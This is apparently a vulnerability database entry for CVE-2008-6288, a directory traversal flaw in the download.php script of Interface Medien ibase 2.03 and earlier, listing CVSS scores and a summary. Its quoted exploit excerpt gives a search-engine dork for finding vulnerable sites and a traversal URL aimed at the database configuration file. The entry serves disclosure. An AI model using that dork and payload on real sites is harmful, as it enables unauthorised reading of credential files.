7.8
CVSSv2

CVE-2008-6288

Published: 25/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N

Vulnerability Summary

Directory traversal vulnerability in download.php in Interface Medien ibase 2.03 and previous versions allows remote malicious users to read arbitrary files via a .. (dot dot) in the filename parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

interface-medien ibase

interface-medien ibase 2.0

Exploits

Name: [AFD] i-base <= 203 Author: Dyshoo Vendor: wwwi-basenet/ Dork: "inurl:ibase site:de" [site]/ibase/zubehoer/downloadphp?filename=[file] Database config: [site]/ibase/zubehoer/downloadphp?filename=/config/config_dbphp # milw0rmcom [2008-07-24] ...